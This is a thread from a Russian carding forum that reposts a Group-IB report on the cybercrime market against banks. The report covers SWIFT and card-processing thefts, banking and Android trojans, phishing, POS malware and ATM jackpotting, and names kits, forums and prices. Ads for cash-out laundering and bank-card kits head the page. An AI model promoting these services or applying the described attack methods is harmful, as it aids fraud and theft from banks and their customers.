TARANTINO OBNAL SERVICE №1 на рынке теневых услуг.
Депозит 1 млн.


✔️ Профессиональное сопровождение любых финансовых операций.

✔️ Россия, страны СНГ и Европы:

  • ➢ ФИЗ / ЮР лица
  • ➢ Мерчанты
  • ➢ ЭПС
  • ➢ Sim-карты
  • ➢ Работа с криптой по всему миру
  • ➢ Денежные переводы
ПЕРЕЙТИ К ТЕМЕ

ДЕБЕТОВЫЕ КАРТЫ СБЕРМАРКЕТ
  • ⭐️ Пожизненная гарантия от краж.
  • ⭐️ Все в наличии. Экспресс-доставка. Лучшие цены.
  • ⭐️ Ветка 2021 года. Сотни отзывов.
  • ⭐️ Статус Ветеран на ДаркМани.
  • ⭐️ Депозит миллион ₽.
КАРТЫ РФ 🇷🇺
КАРТЫ ГРУЗИИ 🇬🇪
ЛК КАЗАХСТАНА 🇰🇿


БОЛЕЕ 1000 КОМПЛЕКТОВ ДРУГИХ ТОПОВЫХ БАНКОВ ВСЕГДА В НАЛИЧИИ

>>> ПЕРЕЙТИ К ТЕМЕ <<<
Telegram: https://t.me/SberMarketTG

У форума есть зеркало в Тор http://darkmonn6oy55o7kgmwr4jny2gi2zj6hyalzcjgl444dvpalannl5jid.onion
Официальный канал Darkmoney в Телеграм https://t.me/+k1c69d6xQsswYzU0
NEW! 🔥 Чат Darkmoney в Телеграм https://t.me/+q40pcoHjSRVmNTE0

[Обзор] рынка высокотехнологичных хищений

Тренер

@Trener_service
.
.
.
Депозит: 500,000 ₽
Регистрация
24.04.15
Сообщения
1,808
Депозит
500,000 ₽
TELEGRAM
https://t.me/trener_service
ОЦЕНКА РЫНКА ВЫСОКОТЕХНОЛОГИЧНЫХ ХИЩЕНИЙ В РОССИИ
Финансовая оценка активности киберпреступников является ярким индикатором смены приоритетов хакеров. Большая часть атакующих следуют за деньгами и, если они находят новые более эффективные способы заработка, они инвестируют время и средства именно туда, создавая новые инструменты, услуги, схемы проведения атак. За прошедший период полностью ушли со сцены трояны для ПК, а хищения с помощью Android-троянов после нескольких лет взрывного роста резко сократились благодаря обновлениями операционной сети от Google, понижению лимитов на переводы по SMS, и с внедрением банками систем раннего обнаружения фрода с функционалом детектирования активности вредоносных программ на устройстве клиента.
На подъеме фишинг – относительно простая тактика атак привлекает на рынок все больше злоумышленников. Основной угрозой для российских банков остаются хорошо подготовленные группы с практикой успешных целевых атак. В среднем в России каждый месяц они грабили 1-2 банка. Впрочем, в 2018 году было 4 месяца, когда мы не зафиксировали ни одного ограбления (январь, февраль, май и июнь).

Далее мы подробно остановимся на группах, стоящих за этими атаками.
24024428_m.png


Целевые атаки на банки
На графике ниже показаны группы, которые проводят целенаправленные атаки на банки с целью хищений. На текущий момент существует всего четыре группы, которые способны
взломать банк, добраться до изолированных финансовых систем и вывести деньги.

Каждая из этих групп имеет более глубокую историю, на графе отмечены моменты начала и завершения попыток ограбить именно банки. Группы, которые занимаются саботажем и шпионаже, на иллюстрации не представлены.

Cobalt, MoneyTaker, Silence состоят из русскоговорящих финансово-мотивированных хакеров, Lazarus принято считать спонсируемой Северной Кореей. Именно эти группы являются центром инноваций и формируют тренды в сложных атаках на банки.
По каждой из этих киберпреступных групп Group-IB первой выпускала отчеты.
24024429_m.png



SWIFT и локальные межбанковские системы

Количество целенаправленных атак на банки с целью хищения через SWIFT увеличилось в три раза. Если за прошлый период было всего три атаки (Гонконг, Украина, Турция), то в этом году прошло успешных атак было уже девять: в Непале, Тайване, России, Мексике, Индии, Болгарии и Чили. По этим инцидентам можно сделать вывод, что для межбанковской системы SWIFT представляют угрозу только две преступные группы: Cobalt и Lazarus.

Первая известная успешная атака Lazarus на SWIFT была проведена в феврале 2016 года в центральном банке Бангладеш. Буквально через два месяца группа Cobalt совершила сразу две успешных атаки на SWIFT в банках Гонконга и Украины.

В некоторые месяцы и Cobalt, и Lazarus совершают хищения сразу в двух банках. Возможно, это связано с общей подготовкой схем обнала. Однако в случае со SWIFT большую часть похищенных средств удается остановить и вернуть пострадавшим банкам.

Посмотрев на атакованные банки и связанные с ними группы, можно заметить, что Lazarus сосредоточила усилия на Азиатско-Тихоокеанском регионе, а Cobalt — на странах Восточной Европы. Атаки на SWIFT в России и Болгарии проводились без специальных инструментов, использовался только стандартный набор Cobalt. Получив в доступ в сеть банка и логины легитимных пользователей, они просто сделали несколько транзакций, большая часть из которых была успешно заблокирована.

Несмотря на то, что Lazarus в этом году достаточно активно пытался похищать деньги через SWIFT, гораздо больших успехов в экономическом смысле они добились, атакуя криптовалютные биржи, о чем мы пишем в соответствующем разделе отчета. Фактов, подтверждающих что эта группа интересуется локальными системами межбанковских переводов не обнаружено.

В одном из инцидентов было установлено, что Cobalt интересуется не только SWIFT, но и локальными системами межбанковских переводов в разных странах. Так, попав в сеть одного из банков, они попробовали вывести деньги и через локальный межбанкинг более 20 миллионов евро, но попытка была неуспешной.
24024430_m.png


Атаки на AРМ КБР
В 2016 году основную угрозу для банков в России представляли атаки на АРМ КБР (Aвтоматизированное рабочее место клиента Банка России). Однако в 2017 и 2018 году хакеры из групп Cobalt и Silence игнорируют данные системы даже в том случае, когда
успешно получают к ним доступ. Сейчас их внимание привлекают более надежные схемы хищений через банкоматы и карточный процессинг. И только группа MoneyTaker сделала одно успешное хищений в ноябре 2017 года через АРМ КБР. Тогда сумма ущерба составила всего 7 миллионов рублей, а в 2018 они успешно вывели из другого банка уже 58 милли
онов рублей. В начале июля 2018 пользователь под псевдонимом Bobby.Axelrod опубликовал на андеграундных форумах фреймворк Pegasus для автоматизации атак на АРМ КБР путем автоматической подмены платежных реквизитов. В архив также входили инструкции и исходные коды. Этот фреймворк использовался группой Buhtrap в 2016 году и все данные
из архива относятся к тому периоду. Ранее часть исходных кодов, используемых Buhtrap, уже утекали в сеть. Стоит отметить, что реализованная в данном фреймворке автозамена платежных реквизитов уже не актуальна для последних версий АРМ КБР, однако
архив представляет большую ценность для автоматизации других шагов по компрометации банковских сетей.

КАРТОЧНЫЙ ПРОЦЕССИНГ
Атаки на карточный процессинг по-прежнему являются одним из основных способов хищений и проводятся группами Cobalt, MoneyTaker, Silence. Этот метод х обеспечивает самый безопасный способ обналичивания и максимальную финансовую выгоду.
Рекордсменом в этой области стала группа Cobalt: в 2017 году в европейском банке они попытались похитить 25 миллионов евро. В других регионах суммы ущерба как правило значительно ниже. Эта схема хищений начала набирать популярность в 2016 году. В сентябре 2016 года группа Cobalt получила доступ в один из банков Казахстана и начала подготовку к новому для них типу хищений — через карточный процессинг. Процесс изучения занял 2
месяца, и в ноябре они успешно похитили около $600 тыс. С тех пор Cobalt — лидер по количеству успешных атак этого типа.
Параллельно вместе с ними схему атак на карточный процессинг начала прорабатывать и группа MoneyTaker. Самая первая атака, с которой мы связываем эту группу, была проведена весной 2016 года, когда в результате получения доступа к системе карточного процессинга STAR компании FirstData был ограблен National Bank of Blacksburg (США). В январе 2017 этот банк подвергся еще одной успешной атаке, о чем стало известно только спустя 7 месяцев после публичного релиза нашего отчета об атаках этой группы. В течение 2017 MoneyTaker взломала еще 9 банков в США.

Группа Silence провела свою первую атаку на карточный процессинг только в марте 2018 года
и сразу успешно похитила 35 млн рублей в одном из банков в России. Для успешного хищения через карточный процессинг атакующим не нужен специализированный софт, как например для атак на банкоматы или для автоподмены платежей в системах межбанковских переводов. Поэтому этот метод доступен всем преступным группам, у которых есть опыт проникновения в банковские сети.

ПЛАТЕЖНЫЕ ШЛЮЗЫ
В этом периоде атаки на платежные шлюзы проводила только группа Cobalt. При этом во второй половине 2017 они похитили деньги у двух компаний, а в 2018 не сделали ни одной попытки. В результате реагирования на второй инцидент в 2018 году мы установили, что помощь в проведении этой атаки им оказывали участники из группы Anunak, которая не проводила подобных атак с 2014 года. Логика работы шлюза подразумевает обработку двух каталогов In и Out, куда помещаются файлы, которые содержат данные в формате, соответствующем транзакциям, полученным от платежных терминалов. Файлы платежей в каталоге In принимаются к исполнению и денежные средства переводятся согласно данным, указанным в файле.
24024431_m.png

Чтобы изучить формат данных, атакующие воспользовались программой FileLogger.exe, позволяющей отслеживать изменения заданного каталога (создание новых файлов) и запись содержимого новых файлов в заданный текстовых файл. Каталог и файл задаются при запуске программы в качестве входных аргументов.

Через такие шлюзы осуществляются переводы небольших сумм, поэтому для крупного хищения необходимо создать множество мелких транзакций. Чтобы автоматизировать работу, атакующие создали уникальную программу ugw.exe.
24024432_m.png

При запуске программа запрашивает файл с именем «terminals.txt», в котором указываются идентификаторы терминалов, от имени которых якобы должны приходить запросы на перевод. Далее в программе указываются счета получателей в виде номеров телефонов и карт, а также суммы переводов. В результате происходит генерация поддельных файлов-платежей, которые сразу помещаются в каталог In платежного шлюза. Таким образом,
атакующим удалось перевести более $2 миллионов.

БАНКОМАТЫ
Атаки на банки с целью заражения их банкоматной сети проводят Cobalt, Silence, а также MoneyTaker. Последняя группа начала тестировать новый уникальный троян в мае 2018 года.

(c) Group-IB
 
Последнее редактирование:
АТАКИ НА КЛИЕНТОВ БАНКОВ

АТАКИ НА КЛИЕНТОВ БАНКОВ

АТАКИ С ПОМОЩЬЮ ТРОЯНОВ ДЛЯ ПК


В России
Тренд на снижение угроз со стороны банковских троянов для ПК в России продолжается с 2012 года. За прошедший период ущерб сократился еще на 12% и составил 547 800 000 руб. Как и за предыдущий год, не появилось ни одного нового банковского трояна для ПК для хищений в России. Более того, не осталось ни одной группы, которая бы занималась хищениями средств у физических лиц в России с использованием таких программ.
Активность проявляют только группы, которые используют банковские трояны для хищений у компаний. Таких команд осталось всего три: Buhtrap2, RTM, Toplel. При этом ни одна из них не использует атаку «человек-в-браузере» (Man-in-the-browser).

Buhtrap2
В 2016 года бот-сеть Buhtrap была продана и теперь используется другими злоумышленниками. Основным методом распространения в первой половине 2017 года был метод Drive-by: преступники взламывали легитимные сайты финансовой тематики (например, www.glavbukh.ru), при посещении которых загружался JavaScript, после чего происходила эксплуатация уязвимости браузера. В результате запускался PowerShell-скрипт, загружающий и приводящий в действие загрузчик Buhtrap. Во второй половине 2017 года тактика атакующих изменилась: вектором распространения троянов стала не традиционная вредоносная рассылка и не взломанные популярные сайты, а создание новых тематических ресурсов, на которых злоумышленники размещали код, предназначенный для загрузки троянов.
Владельцы этой бот-сети активно использовали автоматические переводы через системы бухгалтерского учета 1С. После того, как разработчики 1C реализовали защиту от атак этого типа, включив проверку замены реквизитов, хакеры изменили свой код. Новый Buhtrap способен обходить защиту «1С:Предприятие» «Контроль безопасности обмена с банком»
путем сокрытия отображаемого предупреждения.
24039529_m.png


RTM В мире
Банковский троян RTM начал свою активность в 2016 году и остается востребован преступниками. В конце 2016 года мы видели, что при распространении трояна RTM использовался загрузчик из утекших исходных кодов Buhtrap. Такая связь нередко сбивает специалистов по информационной безопасности при атрибуции.

Как и в случае Buhtrap2, основными способами совершения хищения являются удаленное управление или автоматические переводы через системы бухгалтерского учета 1С. Однако мы не видели атак, которые бы обходили реализованную «1С:Предприятие» защиту от автоподмены реквизитов, как это сделано в Buhtrap.

Toplel
Преступная группа Toplel была обнаружена специалистами Group-IB в феврале 2015 года. В результате исследования было установлено, что она действует минимум с августа 2014 года и использует доменные имена, регистрируемые в зоне .SU. На тот момент для совершения хищений злоумышленники задействовали программу, известную как RDPdoor (xTerm).
Она предоставляет злоумышленнику удаленный доступ к компьютеру, что позволяет совершать транзакции с рабочего места пользователя в тот момент, когда подключен токен с электронной цифровой подписью, необходимой для подтверждения переводов. Программа распространялась преимущественно через письма с вредоносным вложением. Основной целью злоумышленников были клиенты банков России и Украины. Модули трояна RDPdoor определяли следующие системы интернет-банкинга Ibank, bifit, Промсвязь, Альфабанк, Diasoft, Сбербанк, Комита, Tiny, Fobos, ClntW32, cbsmain, BCClient, Tival, cbs, Севергазбанк, Ibc, Interbank, RS.
Кроме трояна RDPdoor, преступники работают с модифицированной версией вредоносной программы Pony, которая может быть использована для сбора логинов и паролей на системах, не имеющих отношение к интернет-банкингу.

В мире
Глобальный ландшафт угроз со стороны банковских троянов изменился значительно сильнее. Появилось шесть новых целевых троянов для ПК: IcedID, BackSwap, DanaBot, MnuBot, Osiris и Xbot. Такое же количество троянов появилось и в прошлом году. Однако использование новых банковских троянов носит преимущественно локальный характер. Трояны Osiris и Xbot изначально предлагались на русскоговорящих хакерских форумах и пока не получили широкого распространения.

При этом со сцены ушли Shifu, Qadars, Sphinx, Tinba и Emotet. Последний по-прежнему используется, но только в качестве загрузчика, а не как полноценный банковский троян. Такое развитие событий может быть связано с работой правоохранительных органов, которые нанесли по рынку ощутимый удар арестами авторов банковских троянов Neverquest,
GozNym, а также одного из самых популярных загрузчиков — Andromeda.
В 2017 году были опубликованы исходные коды банковских троянов TinyNuke и AlphaLeon ( akaThantaos, Mercury Bot), однако их дальнейшего использования не последовало. Мы все еще видим использование банковских троянов, основанных на Zeus (ZeusVM, Atmos, Panda),
но значительно реже и без какого-либо значимого развития. Можно сказать, что они доживают последние дни. Наиболее значимыми банковскими угрозами по-прежнему остаются группы, использующие трояны Dridex, Trickbot, Gozi.

АТАКИ С ПОМОЩЬЮ ANDROID-ТРОЯНОВ


После нескольких лет роста рынок Android-троянов в России вышел на плато, однако продолжает активно развиваться на мировой арене. Пять наиболее распространенных схем хищений, описанных нами в отчете за 2016 год, остались прежними:
• • Хищение через SMS-банкинг
• • Переводы с карты на карту
• • Переводы через онлайн-банкинг
• • Перехват доступ к мобильному банкингу
• • Поддельный мобильный банкинг
24039530_m.png


В России
Активность владельцев Android-троянов резко снизилась благодаря задержаниям в 2017 году владельцев крупнейших в России Android бот-сетей: Cron и Tiny.z. Кроме того, владелец другой крупной бот-сети Honli просто прекратил использование этого трояна. Как следствие, количество проводимых ежедневных хищений снизилось почти в три раза. Также стоит отметить и снижение среднего размера хищений с использованием Android-троянов. Если в прошлом году он составлял 11 тысяч рублей, то в этом году он опустился до 7 тысяч.
Самой активной в прошедшем году была бот-сеть Asacub на базе одноименного приватного трояна.
В августе 2017 появилось предложение о продаже форка этой вредоносной программы, но уже в сентябре тема была закрыта. Вторая по активности бот-сеть Agent.BID долгое время совсем не использовалась, и лишь с начала 2018 года ее владельцы вернулись к активной работе.

В мире
Новые Android-трояны, предлагаемые на хакерских форумах, ориентированы прежде всего на использование за пределами России: Easy, Exobot 2.0, Asacub, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa. Исключением из этого списка является только Asacub.
После публикации исходных кодов трояна Maza-in появилось множество его клонов, которые используются до сих пор. В июле 2017 года другой автор банковского трояна под Android Loki Bot также выложил исходные коды в открытый доступ.
Троян Agent.cj носит чисто локальный характер и атакует пользователей турецких банков. Обычно банковские трояны под Android распространяются через SMS/MMS рассылки. Однако троян Exobot 2.0 в начале 2018 года распространялся через приложения, которые ранее были загружены из официального Google Play. В мае 2018, после того как автор полностью продал свой проект, исходные коды Exobot 2.0 были опубликованы в открытом доступе.
Очень активным русскоговорящим разработчиком банковских Android-троянов является хакер под псевдонимом GanjaMan, который разработал всем известные Gmbot (aka Mazar), Skunk, VBV Grabber. Его старые разработки более не используются, а сам автор этих вредоносных программ заблокирован на хакерских форумах. Однако до блокировки он
успел продать исходные коды своего нового трояна Cannabis.
Трояны, которые были активны в прошлом периоде перестали использоваться, вероятно, из-за плохой поддержки их авторами. К таким троянам относятся Xbot, Abrvall, Vasya, UfoBot, Reich.

Атаки с помощью веб-фишинга

В мире
За прошедший период GIB Threat Intelligence обнаружила и проанализировала 2,6 миллиона уникальных фишинговых ссылок на 727 тысячах доменах — на 9% больше, чем в прошлом году. Подавляющее большинство сайтов для хостинга фишинга (46%) использовали зону .com. на зоны .org, .mx, .net приходится по три процента. Как всегда основная масса фишинговых страниц хостилась в США — 63%. При этом большая часть фишинга хостится на легальных, но взломанных веб-сайтах. В отличии от прошлого периода, первую позицию заняли фишеры, нацеленные на облачные хранилища, а не на финансовый сектор. Неожиданно, самым популярным среди фишеров стал Dropbox, хотя ранее мы видели, что атакующих больше интересуют сервисы Google. 73% всех фишинговых ресурсов попадают в следующие три категории: облачные хранилища (28%), финансы (26%), и онлайн-сервисы (19%).
24039531_m.png


Как и ожидалось, больше всего финансового фишинга относится к компаниям США. На их долю пришлось 80% всех атак в категории. Второе место занимает Франция, потом Германия. На различные проекты, связанные с криптовалютами, пришлось по 1%.

Фишеры, занимающиеся массовыми атаками, используют специальные фишинг-наборы (phishing kits). За прошедший период система GIB Threat Intelligence собрала более 18 000 уникальных таких наборов и проанализировала их конфигурационные файлы. В подавляющем большинстве случаев скомпрометированные данные отправлялись на адрес элек- тронной почты. В 84% случаев фишеры регистрировали почту для сбора скомпрометированных данных на Gmail, на российские Yandex и Mail.ru приходится лишь 4%.

В России

Веб-фишинг — единственный метод хищений, который показал рост в России в этом году. Количество групп, которые создают фишинговые сайты под российские бренды, выросло с 15 до 26. В России фишинг под банки и платежные системы автоматизирован и проходит в реальном времени, что позволяет обходить SMS подтверждения списания денег. Простота
схем и широкий спектр инструментов для хищений привлекает на фишинговый рынок новых игроков.
В этом году с помощью веб-фишинга удалось похитить 251 миллион рублей, что на 6% больше, чем в прошлом году. Средняя сумма одного хищения не изменилась и составляет 1 000 рублей. Общее количество ежедневных успешных атак также выросло, но незначительно — до 1 274. Среднее количество жертв одной группы даже сократилось с 63 до 42. Основным фактором, сдерживающим рост количества атак, является активное выявление фишинговых сайтов и их оперативное закрытие, в том числе благодаря оперативному обмену данными между банками и ФинЦертом (FinCERT) Банка России.
Основными способами привлечения пользователей на фишинговые страницы являются перенаправление посетителей со взломанных сайтов, а также в результате попадания в поисковую выдачу. В России, в отличие от многих других стран, под большую часть фишинговых сайтов регистрируется отдельное доменное имя.
Большую популярность получил фишинг связанный с переводов с карты на карту. В некоторых случаях атакующие брендируют такие фишинговые страницы под конкретный банк, но есть и «небрендированный» фишинг.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Отсюда и ответы для обнал сервисов, почему работы стало у них меньше.
 
В 2016 году основную угрозу для банков в России представляли атаки на АРМ КБР (Aвтоматизированное рабочее место клиента Банка России). Однако в 2017 и 2018 году хакеры из групп Cobalt и Silence игнорируют данные системы даже в том случае, когда успешно получают к ним доступ.
Прикольно) - Бери, - Не не хочу.:D
В целом интересная информация.:cool:
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
++
Есть над чем подумать и немного перестроиться

99,9% обнал сервисов не способно перестроиться и адаптироваться к данным условиям. На всех не хватит скама и подмены, это очевидно.
 
Кардинг
Рынок кардеров можно поделить на два основных сегмента: продажа текстовых данных о картах (номер, дата истечения, имя держателя, адрес, CVV) и «дампов» (содержимое магнитных полос карт). Текстовые данные собираются с помощью фишинговых сайтов, банковских троянов для ПК, Android, банкоматов, а также в результате взломов e-commerce сайтов. Дампы получают с помощью скимминговых устройств, а также с помощью троянов для компьютеров с подключенными POS-терминалами.
Большая часть скомпрометированных карт продается на специализи рованных кард-шопах. Системы GIB Threat Intelligence постоянно фиксируют и анализирует загружаемые на кард-шопы данные. В среднем каждый месяц на них загружается 686 тысяч текстовых данных карт и 1.1 миллионов дампов. По нашим данным, 62% продаваемых данных карт относятся к дампам. Это означает, что POS-угрозы являются основным методом компрометации банковских карт.
Кроме количественных показателей, мы фиксируем и стоимость каждого дампа, что позволяет измерять рынок кардинга. Текстовая информация о банковских картах стоит на кардшопах значительно дешевле: суммарно текстовые данные продавали всего за $95.6 миллионов, что составляет всего лишь 17% от общего рынка. Например, 19.9 миллионов дампов стоили уже $567.8 миллионов.
24053255_m.png


POS-угрозы
Основным методом получения дампов банковских карт является использование POS-троянов, которыми заражают компьютеры с подключенными POS-терминалами. Принцип работы всех POS-троянов остался неизменным: они собирают данные карт из оперативной памяти в тот момент, когда карты считывают через POS-терминал.
Атакующие по-прежнему делятся на две категории:
• • массово и случайно атакующие всех подряд в поисках возможности установить POS-троян;
• • целенаправленно атакующие вендоров POS-терминалов или крупные сетевые организации, доступ в сети которых открывает возможность заражения сразу множества устройств.
Самый серьезный удар по индустрии кардинга был нанесен в начале 2018 года, когда Министерство юстиции США сообщило об аресте и предъявлении обвинений трем гражданам Украины, которые входили в состав группы FIN7 (aka Navigator). Согласно данным из обвинительных заключений Дмитрий Федоров (Hotdima), Федор Гладырь (Das или AronaXus) и Андрей Копаков (Santisimo) были задержаны в январе и марте 2018. Официальное заявление Министерства юстиции гласит, что с 2015 года группа FIN7 атаковала более 100 компаний и организаций на территории США, взломав тысячи различных систем. Сообщается, что только в США хакеры похитили свыше 15 миллионов платежных карт, скомпрометировав более 6 500 PОS-терминалов. Рынок POS-угроз достаточно динамичный. Отслеживая андеграундные форумы и участвуя в реагировании на инциденты, специалисты Group-IB регулярно наблюдают появление новых троянов, а также
продажу и публикацию в открытом доступе исходных кодов уже зарекомендовавших в реальных атаках инструментов.

Продажа и публикация исходных кодов POS-троянов

05 октября 2017 На андеграундном форуме было опубликовано объявление о продаже исходного кода банковского бота Dented. Данный троян обладает функциями по сбору TRACK1 и TRACK2 банковской карты. Продажа осуществляется трем клиентам по цене $3000 с оплатой в Bitcoin.
8 февраля 2018 Пользователь ftp_admin выставил на продажу исходные коды своего трояна POS Sniffer за $5000. Троян, продававшийся с марта 2016 года, реализован в виде драйверов к системе и работает под Windows x32.
08 июня 2018 Поль зователь cocofresh опубликовал тему с продажей исходных кодов POS-трояна MagicPos с административной панелью за $350.
08 мая 2018 Пользователь Unsigned char опубликовал ссылку на скачивание исходных кодов POS-трояна для сбора Track1 и Track2.
06 апреля 2018 Пользователем crossair опубликовал на андеграундном форуме архив, содержащий исходные коды POS-трояна Treasure Hunter. Впервые информация об этом трояне появилась еще в 2014 году. Архив trhutt34C.rar содержит внутри себя два файла: adminPanel.rar и cSources.rar — исходные коды административной панели и самой вредоносной программы.
24053256_m.png

24053257_m.png


Новые трояны
Июнь 2017 Зафиксирована серия атак на бразильские компании с новым POS трояном LockPos, который связывают с группой, ранее использовавшей FlokiBot.
Сентябрь 2017 Пользователь Refreshers опублико вал тему по продаже нового трояна для POS-систем SisyphusPOS.
Октябрь 2017 Специалисты из Proofpoint обнаружили, что группа Lazarus использует новый POS-троян RatankbaPOS для атак на компании в Южной Корее.
Ноябрь 2017 Специалистами RSA был выявлен новый POS-троян GratefulPOS, код которого состоит из фрагментов кодов вредоносных семейств FrameworkPOS, TRINITY, BlackPOS и BrickPOS. По аналогии с FrameworkPOS, вредонос извлекает данные платежных карт из оперативной памяти терминала и отправляет их на управляющий сервер в виде зашифрованных DNS-запросов.
Декабрь 2017 Исследователи из компании Kroll Cyber Security идентифицировали еще один POS-троян PinkKite. PinkKite весит всего 6 КБ и содержит модули считывания памяти и проверки данных. Особенностью этой кампании является ручная пересылка данных карт через отдельный сеанс RDP на один из трех центров обмена информацией PinkKite.
Февраль 2018 Исследователи из компании Forcepoint обнаружили троян с именем UDPoS, маскирующийся под легитимное средство удаленного управления LogMeIn и передающий данные кредитных карт с помощью DNS-запросов.

ATM-угрозы

Некоторые группы не способны взломать сеть банка и заразить банкоматную сеть, но могут заразить отдельные банкоматы при наличии физического доступа. В прошедшем периоде для банковского сектора активными были две угрозы: Cutlet и Ploutus-D.
Общая схема атаки «Jackpotting» включает 3 уровня злоумышленников:
• • организатор / заказчик;
• • разработчик ПО;
• • дропы.
Главным в атаке является организатор, чаще всего он и заказывает разработку вредоносной программы. Основной целью организатора является получение денег с минимальными рисками. Для начала работы ему нужен полный набор инструментов. Есть два пути для их получения: заказать у разработчиков или перекупить у других злоумышленников. Далее организатор находит команду дропов (не менее 2-х человек) — людей, которым необходимо получить физический доступ к внутренней системе банкомата.
Чтобы дропы не обманули организатора и не начали самостоятельную работу, в наборе вредоносных программ имеется специальный генератор ключей. Когда вредоносное ПО загружается в банкомат, оно требует ключ активации для дальнейшей работы. Такой ключ можно получить только из генератора ключей, который находится у организатора.

Для вскрытия банкомата злоумышленники высверливают, прорезают или прожигают отверстия на лицевой панели клавиатуры банкомата. Средний размер отверстия составляет 5 сантиметров. После этого они получают прямой доступ к шлейфу проводов. Злоумышленники отсоединяют диспенсер от USB-хаба или COM-порта (в зависимости от банкомата) и устанавливают на его место специальную заглушку, которая имитирует работу диспенсера. Затем они подключают к USB/COM порту диспенсера микрокомпьютер с низким энергопотреблением. В этот момент дропы используют телефоны для взаимодействия с организатором и получения ключа активации. Средняя продолжительность действий злоумышленников, требуемых для хищения денежных средств, составляет около 8 минут. После получения наличности преступники заклеивали отверстие в банкомате с помощью наклейки.

Cutlet
В середине 2017 года появился новый комплект для атак на банкоматы, в том числе с новой вредоносной программой, которую назвали cutlet. Теперь вместе с набором инструментов шла максимально подробная инструкция по использованию с советами, как избежать проблем при работе. Впоследствии cutlet получила собственное приложение под Android, что позволяло злоумышленнику не использовать ноутбук, а обходится смартфоном.
24053258_m.png


Набор «Cutlet» до сих пор остаётся актуальным. Мы наблюдаем большое количество активных тем о продаже на хакерских форумах.
06 декабря 2017 Пользователь под ником cutlet master опубликовал предложение о продаже полного набора софта Cutlet Maker на форуме crdclub.ws. Стоимость полного набора составила 1 000$. в набор входят 3 программы:
• • Stimulator22 — предназначена для проверки баланса в кассетах банкомата;
• • c0decalc — предназначена для генерации кода активации программы Cutlet Maker;
• • Cutlet Maker 1.0 F — предназначена для вывода денег из банкомата.
15 декабря 2017 Пользователь под ником md5 опубликовал предложение о продаже полного набора софта Cutlet Maker на форуме ifud.ws. Стоимость полного набора составила уже $800, однако через неделю цена была снижена до $500. Отметим, что самый первый комплект «cutlet» продавался за $5 000.
17 января 2018 Пользователь под ником «she0» опубликовал предложение о продаже полного набора софта «Cutlet Maker» на форуме moneymaker.hk. Стоимость полного набора составила 50 000 рублей.
20 декабря 2017 На самом популярном русскоязычном андеграундном форуме exploit.in была устроена бесплатная раздача полного набора ПО. Пользователь под ником Onions пообещал раздать софт первым 3 отписавшимся старожилам форума.
20 декабря 2017 На форуме migalki.pw пользователь под ником vulns опубликовал ссылку для скачивания cutlet. Архив содержал два файла: cm17F (Cutlet Maker 1.7 F), Stimulator22.
28 мая 2018 Пользователь с псевдонимом sl111 опубликовал объявление о продаже нового ATM трояна Котлета v2. Объявление было размещено на форуме exploit.in.
Котлета v2 представляет собой вредоносную программу для банкоматов Wincor. Исходя из текста объявления, Котлета v2 обладает практически теми же функциональными возможностями, что и Cutlet Maker. Отличием трояна от своего предшественника является отсутствие необходимости в генерации паролей активации (генерация происходила с помощью утилиты c0decalc.exe). Автор объявления, судя по сообщению являющийся разработчиком этого вредоносного ПО,предложил троян вместе с исходными кодами. Троян написан на C/C++. Цена Котлеты v2 составляет $5 000. В комплекте с трояном идут исходные коды, документация и инструкция по его применению.

Ploutus-D
25 января 2018 компания Diebold Nixdorf опубликовала отчёт «Potential Jackpotting US». В нём сообщается, что власти США предупреждают компанию о том, что на территории США впервые зафиксирована атака типа «Jackpotting» на банкоматы, произведенные их компанией. Ранее, в октябре 2017 года подобная атака была зафиксирована на территории Мексики. Также в СМИ появилась информация, что атаке могли подвернуться банкоматы компании NCR Corp. Предположительно, злоумышленники для атаки использовали вредоносное ПО Ploutus-D.
Ploutus-D – новая модификация более старой версии Ploutus. Эта программа впервые была замечена в Мексике в 2013 году. Тогда она распространялась при помощи CD-ROM. Первые упоминания Ploutus-D на андеграундных форумах датируются началом 2017 года. Однако ни одного положительного отзыва о работе или хотя бы проверке данного ПО нет, а все вендоры, которые создавали топики о его продаже, имеют пло*** репутацию. Активных продаж программы на андеграундных форумах не замечено.
Ploutus не уникальная разработка, в мире существует несколько различных реализаций примерно одной и той же схемы атаки. Различия между ними минимальны и сводятся к специализации на определённом виде банкоматов, наиболее распространённых в регионе использования программы.

(c)Group-IB
 
Cutlet
В середине 2017 года появился новый комплект для атак на банкоматы, в том числе с новой вредоносной программой, которую назвали cutlet. Теперь вместе с набором инструментов шла максимально подробная инструкция по использованию с советами, как избежать проблем при работе. Впоследствии cutlet получила собственное приложение под Android, что позволяло злоумышленнику не использовать ноутбук, а обходится смартфоном.
24053258_m.png


Набор «Cutlet» до сих пор остаётся актуальным. Мы наблюдаем большое количество активных тем о продаже на хакерских форумах.
6 ноября 2018г. задержаны двое молодых людей, подозреваемых в хищении денежных средств из терминалов.
Установлено, что злоумышленники на территории г. Москвы и других регионов России с 2017 года похищали денежные средства из банкоматов различных кредитно-финансовых учреждений России. Подозреваемые использовали носитель информации, на котором находилось программное обеспечение удаленного доступа к операционной системе платежных устройств, который после подключения позволяло совершать манипуляции необходимые для выгрузки денежных средств.
В результате оперативно-розыскных мероприятий в Луховицком районе Московской области сотрудниками полиции была остановлена автомашина, в которой находились двое мужчин в возрасте 29 и 32 лет. При осмотре автомобиля изъяты денежные средства на общую сумму более 6,5 миллиона рублей. Обнаружены мобильные телефоны, сим-карты и ноутбуки, которые использовались для совершения противоправных деяний.
возбуждено уголовное дело по признакам преступления, предусмотренного частью 2 статьи 159.6 УК РФ. В отношении фигурантов судом избрана мера пресечения в виде заключения под стражу.
Установлены обстоятельства 12 аналогичных преступлений, совершенных на территории Российской Федерации. По предварительным оценкам, сумма материального ущерба юридическим лицам превысила 20 миллионов рублей.
В настоящее время сотрудники полиции проводят комплекс оперативно-розыскных мероприятий и следственных действий, направленных на выявление дополнительных эпизодов противоправной деятельности подозреваемых.

https://www.youtube.com/watch?v=bkA-C2F9wLk
 
Последнее редактирование:
Взлом по-северокорейски. Как APT38 уводит из банков сотни миллионов долларов.

Взлом по-северокорейски. Как группировка APT38 уводит из банков сотни миллионов долларов.

